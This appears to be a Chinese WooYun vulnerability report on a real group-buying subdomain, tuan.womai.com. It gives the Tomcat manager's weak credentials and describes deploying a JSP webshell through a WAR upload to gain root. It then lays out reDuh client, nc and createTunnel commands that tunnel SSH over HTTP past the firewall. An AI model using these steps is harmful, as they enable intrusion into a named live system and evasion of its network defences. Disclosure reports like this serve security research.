WooYun.org

分站地址：http://tuan.womai.com
WEB服务用的Tomcat,存在弱口令tomcat/tomcat
地址：http://tuan.womai.com/manager/html
进去之后上传带有JSP马的war包，然后部署即可。

root权限，开了ssh，但被防火墙墙了。

此时可以用reduh打通http隧道。
reduh官网：http://www.sensepost.com/labs/tools/pentest/reduh
原理：运行于服务器的JSP脚本接受HTTP请求，在本地转发给相应的端口，并接受本地端口的数据再通过HTTP发送给远程客户端。这样本来应该走其他端口的数据变摇身一变，披上了HTTP协议的报文头，换走HTTP的端口了。
reduh分客户端和服务端，具体步骤如下：
1. 将服务端reDuh.jsp上传至服务器，假设上传后的地址为：http://tuan.womai.com/jspspy/reDuh.jsp
2. 本地运行

java -jar reDuhClient.jar http://tuan.womai.com/jspspy/reDuh.jsp

3. nc监听本地1010端口

nc -vv localhost 1010

连接成功后，输入以下命令，其中1234为本地端口，22为要连接的远程服务器端口

[createTunnel]1234:127.0.0.1:22

现在连接本地的1234端口就等于连接远程服务器的22端口。

数据库用的Oracle，不过server.xml里没翻到oracle密码，应该写到代码里了吧，没继续找了 0.0